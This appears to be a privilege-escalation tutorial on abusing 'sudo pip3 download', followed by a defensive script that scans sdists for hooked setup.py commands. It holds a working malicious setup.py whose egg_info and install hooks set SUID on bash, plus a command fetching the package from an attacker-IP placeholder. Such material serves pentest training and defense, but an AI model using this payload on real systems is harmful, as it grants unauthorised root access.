Pip Download Code Execution
Theory
Pip is a package management system written in Python. It can download a custom Python package from an arbitrary URL, so if we control that source we can build a malicious package whose setup.py executes arbitrary code.
Practice
Assume that pip download can be executed as root through sudo. If we control its input, it is vulnerable to arbitrary code execution.

sudo -l
(root): /usr/bin/pip3 download http\://*.tar.gz

On the attacking machine, we can clone the this_is_fine_wuzzi GitHub repo, or create our own source for the pip package as follows.
Assuming the package name is MySimplePackage, we need to create the following files and folders: setup.py in the project root, and __init__.py and main.py in the src directory.
mkdir MySimplePackage && cd MySimplePackage
touch setup.py
mkdir src
touch src/__init__.py
echo 'print("hello")' > src/main.py

Write something similar in the setup.py file. You may edit the RunCommand() function.
# setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info

def RunCommand():
    # Arbitrary code here!
    import os;os.system("chmod u+s /usr/bin/bash")

# egg_info runs when pip reads the package metadata, i.e. already during pip download
class RunEggInfoCommand(egg_info):
    def run(self):
        RunCommand()
        egg_info.run(self)

# install runs on pip install
class RunInstallCommand(install):
    def run(self):
        RunCommand()
        install.run(self)

setup(
    name = "MySimplePackage",
    version = "0.0.1",
    license = "MIT",
    packages=find_packages(),
    cmdclass={
        'install' : RunInstallCommand,
        'egg_info': RunEggInfoCommand
    },
)

Build the malicious package.
# If you don't have the modules below, install them first.
pip3 install setuptools
pip3 install build
# Build - it generates a .tar.gz file in the dist folder.
python3 -m build

Finally, host the package and run pip download on the victim machine.

sudo /usr/bin/pip3 download http://<ATTACKING_IP>/MySimplePackage-0.0.1.tar.gz
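Because pip has to run the egg_info command to read a source package's metadata, the hook above fires on a plain download, not only on install. The following added example (my own code, not part of this page or of the this_is_fine_wuzzi repo) shows how a defender can inspect a downloaded .tar.gz for such cmdclass overrides without ever executing setup.py: it parses the file with Python's ast module and reports which commands map to a class that overrides run(). The sample sdist is constructed in memory and uses the class layout from this page with the payload left out.

```python
import ast
import io
import tarfile

def find_hooked_commands(setup_src: str) -> dict:
    """Map each cmdclass entry in setup() to its class, for classes that override run()."""
    tree = ast.parse(setup_src)
    overrides_run = {c.name for c in ast.walk(tree) if isinstance(c, ast.ClassDef)
                     and any(isinstance(f, ast.FunctionDef) and f.name == "run" for f in c.body)}
    hooked = {}
    for call in ast.walk(tree):
        if not (isinstance(call, ast.Call) and getattr(call.func, "id", None) == "setup"):
            continue
        for kw in call.keywords:
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                for key, val in zip(kw.value.keys, kw.value.values):
                    if (isinstance(key, ast.Constant) and isinstance(val, ast.Name)
                            and val.id in overrides_run):
                        hooked[key.value] = val.id
    return hooked

def scan_sdist(tar_bytes: bytes) -> dict:
    """Pull <pkg>/setup.py out of a .tar.gz sdist and inspect it; the file is never executed."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            parts = m.name.split("/")
            if m.isfile() and len(parts) == 2 and parts[1] == "setup.py":
                return find_hooked_commands(tar.extractfile(m).read().decode())
    return {}

def build_sdist(setup_src: str) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("MySimplePackage-0.0.1/setup.py")
        info.size = len(setup_src.encode())
        tar.addfile(info, io.BytesIO(setup_src.encode()))
    return buf.getvalue()

# Constructed sample sdist contents: the cmdclass layout used on this page, payload left out.
HOOKED_SETUP = """from setuptools import setup
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
class RunEggInfoCommand(egg_info):
    def run(self): egg_info.run(self)
class RunInstallCommand(install):
    def run(self): install.run(self)
setup(name="MySimplePackage", version="0.0.1",
      cmdclass={"install": RunInstallCommand, "egg_info": RunEggInfoCommand})
"""
```

On a real archive, pass the file's bytes to scan_sdist(); a non-empty result means setup.py runs custom code during metadata generation or install and deserves a manual look before pip touches it.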